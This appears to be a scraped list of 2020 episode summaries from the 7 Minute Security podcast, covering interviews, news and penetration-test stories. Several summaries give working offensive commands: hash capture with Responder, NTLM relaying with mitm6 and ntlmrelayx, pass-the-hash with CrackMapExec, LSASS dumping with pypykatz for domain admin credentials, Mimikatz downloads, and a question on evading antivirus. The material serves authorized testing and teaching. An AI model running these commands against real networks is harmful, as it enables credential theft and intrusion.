7MS #474: Password Cracking in the Cloud - Part 3

Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits: My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!) PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings. eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more. I've also got some personal updates for you, including: House updates Fighting with the man/woman upstairs My worst Webinar nightmare came true A socially distanced wedding singing experience

19 Aug 202053min

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including: Misconfigured cloud databases Why is this such a common issue, and how can we address it? Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud? What tools can we use to better secure our cloud databases? How can we secure sensitive information as we migrate it from LAN side to the cloud? CCPA (California Consumer Privacy Act) What is the CCPA? How does it relate to GDPR? If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know? Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?" Does CCPA only apply to California residents and companies? Secure data sharing What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns? What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients? What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

12 Aug 202042min

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense. We've got another swell tale of internal pentest pwnage for you today! Highlights include: If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes! Here's one way you can grab the latest CME binary: curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different: cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable If you're looking to block IPv6 (ab)use in your environment, this article has some great tips. When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords. A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to. I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more! Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

7 Aug 202049min

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said: For the Windows VM Turn on RDP with PowerShell: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" Change time zone with command line: tzutil /s "Central Standard Time" Install Chrome with PowerShell: $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound) Install PowerUpSQL: Install-Module -Name PowerUpSQL Turn off sleepy time: powercfg.exe -change -standby-timeout-ac 0 Install DotNet 3.5: dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM Refresh the SSH keys: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Get SharpHound and Mimikatz: wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe Install pypykatz sudo pip3 install pypykatz Install CrackMapExec binaries (which at time of this publication is this one): curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

30 Juli 202037min

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: Hackers are trying to steal admin passwords from F5 devices Secret service reports increase in hacked MSPs Most Popular Home Routers Have ‘Critical’ Flaws "Sigred" DNS vulnerability in Microsoft DNS

22 Juli 202033min

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows: Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven! Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down. Testing for MS14-025 is easy with this site. mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this: smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10 Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done. Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share Then, once you've pulled back the lsass.dmp file, you can rip through it easily with: pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

15 Juli 202059min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies: Acceptable use Data protection and privacy

10 Juli 202042min

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network! I'm especially excited because today's episode marks two important 7MS firsts: The episode has been crafted by a professional podcast producer The episode has been transcribed by a professional transcription service

1 Juli 202036min